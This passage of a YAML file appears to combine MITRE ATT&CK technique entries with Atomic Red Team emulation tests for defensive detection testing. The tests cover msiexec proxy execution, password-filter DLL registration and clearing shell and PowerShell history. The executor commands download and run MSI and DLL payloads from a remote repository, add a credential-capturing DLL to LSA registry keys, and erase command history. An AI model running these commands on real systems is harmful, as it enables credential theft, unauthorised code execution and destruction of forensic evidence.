msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi
msi_exe:
description: MSIExec File Path
type: path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
types.
'
type: string
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi" -OutFile "#{msi_payload}"
executor:
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded EXE
auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
description: 'Executes an MSI containing an embedded EXE using msiexec.exe
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi
msi_exe:
description: MSIExec File Path
type: path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
types.
'
type: string
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi" -OutFile "#{msi_payload}"
executor:
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
- name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
description: 'Executes an MSI containing embedded JScript code using the WMI
Win32_Product class
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi
action:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
'
type: string
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi" -OutFile "#{msi_payload}"
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
'
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
auto_generated_guid: cf470d9a-58e7-43e5-b0d2-805dffc05576
description: 'Executes an MSI containing embedded VBScript code using the WMI
Win32_Product class
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi
action:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
'
type: string
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi" -OutFile "#{msi_payload}"
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
'
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
auto_generated_guid: 32eb3861-30da-4993-897a-42737152f5f8
description: 'Executes an MSI containing an embedded DLL using the WMI Win32_Product
class
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi
action:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
'
type: string
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi" -OutFile "#{msi_payload}"
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
'
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
auto_generated_guid: 55080eb0-49ae-4f55-a440-4167b7974f79
description: 'Executes an MSI containing an embedded EXE using the WMI Win32_Product
class
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi
action:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
'
type: string
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi" -OutFile "#{msi_payload}"
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
'
name: powershell
- name: Msiexec.exe - Execute the DllRegisterServer function of a DLL
auto_generated_guid: 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
description: 'Loads a DLL into msiexec.exe and calls its DllRegisterServer function.
Note: the DLL included in the "bin" folder is only built for 64-bit, so this
won''t work on a 32-bit OS.
'
supported_platforms:
- windows
input_arguments:
dll_payload:
description: DLL to execute that has an implemented DllRegisterServer function
type: path
default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll
msi_exe:
description: MSIExec File Path
type: path
default: c:\windows\system32\msiexec.exe
dependency_executor_name: powershell
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
'
prereq_command: 'if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile "#{dll_payload}"
executor:
command: '#{msi_exe} /y "#{dll_payload}"
'
name: command_prompt
- name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
description: 'Loads a DLL into msiexec.exe and calls its DllUnregisterServer
function. Note: the DLL included in the "bin" folder is only built for 64-bit,
so this won''t work on a 32-bit OS.
'
supported_platforms:
- windows
input_arguments:
dll_payload:
description: DLL to execute that has an implemented DllUnregisterServer
function
type: path
default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll
msi_exe:
description: MSIExec File Path
type: path
default: c:\windows\system32\msiexec.exe
dependency_executor_name: powershell
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
'
prereq_command: 'if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile "#{dll_payload}"
executor:
command: '#{msi_exe} /z "#{dll_payload}"
'
name: command_prompt
- name: Msiexec.exe - Execute Remote MSI file
auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
in application installation, commonly seen in malware execution. The MSI executes
a built-in JScript payload that launches powershell.exe.
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: string
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
msi_exe:
description: MSIExec File Path
type: path
default: c:\windows\system32\msiexec.exe
executor:
command: '#{msi_exe} /q /i "#{msi_payload}"
'
name: command_prompt
T1556.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
created: '2020-02-11T19:05:45.829Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/002
external_id: T1556.002
- source_name: Clymb3r Function Hook Passwords Sept 2013
description: Bialek, J. (2013, September 15). Intercepting Password Changes
With Function Hooking. Retrieved November 21, 2017.
url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- source_name: Carnal Ownage Password Filters Sept 2013
description: Fuller, R. (2013, September 11). Stealing passwords every time
they change. Retrieved November 21, 2017.
url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:39.067Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
as they are validated. \n\nWindows password filters are password policy enforcement
mechanisms for both domain and local accounts. Filters are implemented as
DLLs containing a method to validate potential passwords against password
policies. Filter DLLs can be positioned on local computers for local accounts
and/or domain controllers for domain accounts. Before registering new passwords
in the Security Accounts Manager (SAM), the Local Security Authority (LSA)
requests validation from each registered filter. Any potential changes cannot
take effect until every registered filter acknowledges validation. \n\nAdversaries
can register malicious password filters to harvest credentials from local
computers and/or entire domains. To perform proper validation, filters must
receive plain-text credentials from the LSA. A malicious password filter would
receive these plain-text credentials every time a password request is made.(Citation:
Carnal Ownage Password Filters Sept 2013)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Vincent Le Toux
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
dll_path:
description: Path to DLL to be installed and registered
type: path
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: string
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
cleanup_command: |
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
- name: Install Additional Authentication Packages
auto_generated_guid: 91580da6-bc6e-431b-8b88-ac77180005f2
description: "lsass.exe loads all DLLs specified by the Authentication Packages
REG_MULTI_SZ value.\nUses PowerShell to install and register a password filter
DLL. Requires a reboot and administrative privileges.\nThe binary in bin is
https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
dll_path:
description: Path to DLL to be installed and registered as additional authentication
package
type: path
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: string
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$AuthenticationPackagesValues = $lsaKey.GetValue("Authentication Packages")
$AuthenticationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Authentication Packages" $AuthenticationPackagesValues
cleanup_command: |
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1070.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc
created: '2022-06-15T18:00:04.219Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/007
external_id: T1070.007
- source_name: FreeDesktop Journal
description: freedesktop.org. (n.d.). systemd-journald.service. Retrieved
June 15, 2022.
url: https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html
- source_name: Microsoft RDP Removal
description: Microsoft. (2021, September 24). How to remove entries from the
Remote Desktop Connection Computer box. Retrieved June 15, 2022.
url: https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer
- source_name: Moran RDPieces
description: Moran, B. (2020, November 18). Putting Together the RDPieces.
Retrieved October 17, 2022.
url: https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf
- source_name: Apple Culprit Access
description: rjben. (2012, May 30). How do you find the culprit when unauthorized
access to a computer is a problem?. Retrieved August 3, 2022.
url: https://discussions.apple.com/thread/3991574
- source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
August 19, 2021.'
url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-16T20:37:16.734Z'
name: Clear Network Connection History and Configurations
description: |-
Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
Windows may also store information about recent RDP connections in files such as C:\Users\\%username%\Documents\Default.rdp and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network Devices
x_mitre_version: '1.2'
atomic_tests: []
T1600.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8
created: '2020-10-19T19:03:48.310Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1600/001
external_id: T1600.001
- source_name: Cisco Synful Knock Evolution
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
- source_name: Cisco Blog Legacy Device Attacks
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:40.223Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1070.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a
created: '2020-01-31T12:32:08.228Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/003
external_id: T1070.003
- source_name: Broadcom ESXi Shell Audit
description: Broadcom. (2025, February 20). Auditing ESXi Shell logins and
commands. Retrieved March 26, 2025.
url: https://knowledge.broadcom.com/external/article/321910/auditing-esxi-shell-logins-and-commands.html
- source_name: Sophos PowerShell command audit
description: jak. (2020, June 27). Live Discover - PowerShell command audit.
Retrieved August 21, 2020.
url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
- source_name: Microsoft PowerShell Command History
description: Microsoft. (2020, May 13). About History. Retrieved September
4, 2020.
url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
- source_name: US-CERT-TA18-106A
description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored
Cyber Actors Targeting Network Infrastructure Devices. Retrieved October
19, 2020.
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
- source_name: Sophos PowerShell Command History Forensics
description: Vikas, S. (2020, August 26). PowerShell Command History Forensics.
Retrieved November 17, 2024.
url: https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:40.313Z'
name: 'Indicator Removal on Host: Clear Command History'
description: "In addition to clearing system logs, an adversary may clear the
command history of a compromised account to conceal the actions undertaken
during an intrusion. Various command interpreters keep track of the commands
users type in their terminal so that users can retrace what they've done.\n\nOn
Linux and macOS, these command histories can be accessed in a few different
ways. While logged in, this command history is tracked in a file pointed to
by the environment variable HISTFILE. When a user logs off a
system, this information is flushed to a file in the user's home directory
called ~/.bash_history. The benefit of this is that it allows
users to go back to commands they've used before in different sessions. Adversaries
may delete their commands from these logs by manually clearing the history
(history -c) or deleting the bash history file rm ~/.bash_history.
\ \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
on network devices to clear command history data (clear logging
and/or clear history).(Citation: US-CERT-TA18-106A) On ESXi servers,
command history may be manually removed from the `/var/log/shell.log` file.(Citation:
Broadcom ESXi Shell Audit)\n\nOn Windows hosts, PowerShell has two different
command history providers: the built-in history and the command history managed
by the PSReadLine module. The built-in history only tracks the
commands used in the current session. This command history is not available
to other sessions and is deleted when the session ends.\n\nThe PSReadLine
command history tracks the commands used in all PowerShell sessions and writes
them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
by default). This history file is available to all sessions and contains all
past history since the file is not deleted when the session ends.(Citation:
Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell
command Clear-History to flush the entire command history from
a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt
file. Adversaries may also delete the ConsoleHost_history.txt
file or edit its contents to hide PowerShell commands they have run.(Citation:
Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History
Forensics)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Vikas Singh, Sophos
- Emile Kenning, Sophos
- Austin Clark, @c2defense
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Network Devices
- Windows
x_mitre_version: '1.6'
identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
description: 'Clears bash history via rm
'
input_arguments:
history_path:
description: Bash history path
type: path
default: "~/.bash_history"
supported_platforms:
- linux
- macos
executor:
command: 'rm #{history_path}
'
name: sh
- name: Clear Bash history (echo)
auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
description: 'Clears bash history via echo
'
input_arguments:
history_path:
description: Bash history path
type: path
default: "~/.bash_history"
supported_platforms:
- linux
executor:
command: 'echo "" > #{history_path}
'
name: sh
- name: Clear Bash history (cat dev/null)
auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f
description: 'Clears bash history via cat /dev/null
'
supported_platforms:
- linux
- macos
input_arguments:
history_path:
description: Bash history path
type: path
default: "~/.bash_history"
executor:
command: 'cat /dev/null > #{history_path}
'
name: sh
- name: Clear Bash history (ln dev/null)
auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
description: 'Clears bash history via a symlink to /dev/null
'
supported_platforms:
- linux
- macos
input_arguments:
history_path:
description: Bash history path
type: path
default: "~/.bash_history"
executor:
command: 'ln -sf /dev/null #{history_path}
'
name: sh
- name: Clear Bash history (truncate)
auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739
description: 'Clears bash history via truncate
'
supported_platforms:
- linux
input_arguments:
history_path:
description: Bash history path
type: path
default: "~/.bash_history"
executor:
command: 'truncate -s0 #{history_path}
'
name: sh
- name: Clear history of a bunch of shells
auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
'
supported_platforms:
- linux
- macos
executor:
command: |
unset HISTFILE
export HISTFILESIZE=0
history -c
name: sh
- name: Clear and Disable Bash History Logging
auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
description: 'Clears the history and disable bash history logging of the current
shell and future shell sessions
'
supported_platforms:
- linux
- macos
executor:
command: |
set +o history
echo 'set +o history' >> ~/.bashrc
. ~/.bashrc
history -c
cleanup_command: |
sed -i 's/set +o history//g' ~/.bashrc
. ~/.bashrc
set -o history
name: bash
- name: Use Space Before Command to Avoid Logging to History
auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6
description: 'Using a space before a command causes the command to not be logged
in the Bash History file
'
supported_platforms:
- linux
- macos
executor:
command: |
hostname
whoami
name: sh
- name: Disable Bash History Logging with SSH -T
auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1
description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
keeps the ssh client from catching a proper TTY, which is what usually gets
logged on lastlog
'
supported_platforms:
- linux
dependencies:
- description: 'Install sshpass and create user account used for excuting
'
prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
>/dev/null)\n"
get_prereq_command: |
[ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1
[ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1
(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass)
executor:
command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
'
cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y testuser1 || userdel
-f testuser1
'
name: sh
- name: Clear Docker Container Logs
auto_generated_guid: 553b39f9-1e8c-47b1-abf5-8daf7b0391e9
description: 'Clears Docker container logs using the Docker CLI and the truncate
command, removing all log entries.
'
supported_platforms:
- linux
executor:
name: bash
command: 'docker container prune -f && sudo truncate -s 0 /var/lib/docker/containers/*/*-json.log
'
elevation_required: true
- name: Prevent Powershell History Logging
auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
description: 'Prevents Powershell history
'
supported_platforms:
- windows
executor:
command: 'Set-PSReadlineOption -HistorySaveStyle SaveNothing
'
name: powershell
cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
- name: Clear Powershell History by Deleting History File
auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
description: 'Clears Powershell history
'
supported_platforms:
- windows
executor:
command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath
'
name: powershell
- name: Set Custom AddToHistoryHandler to Avoid History File Logging
auto_generated_guid: 1d0d9aa6-6111-4f89-927b-53e8afae7f94
description: "The \"AddToHistoryHandler\" receives the current command as the
$line variable and then returns $true if \nthe line should be written to the
history file. Here we simply return $false so nothing gets added to \nthe
history file for the current session. \n"
supported_platforms:
- windows
executor:
command: 'Set-PSReadLineOption -AddToHistoryHandler { return $false }
'
cleanup_command: 'Set-PSReadLineOption -AddToHistoryHandler $null
'
name: powershell
- name: Clear PowerShell Session History
auto_generated_guid: 22c779cd-9445-4d3e-a136-f75adbf0315f
description: "This technique involves using the Clear-History cmdlet in PowerShell
to remove all records of previously executed commands.\nThis action is often
performed by attackers to eliminate traces of their activities, making incident
detection and forensic \ninvestigation more challenging. By clearing the session
history, adversaries aim to obfuscate their operational footprint.\n"
supported_platforms:
- windows
executor:
command: 'Clear-History
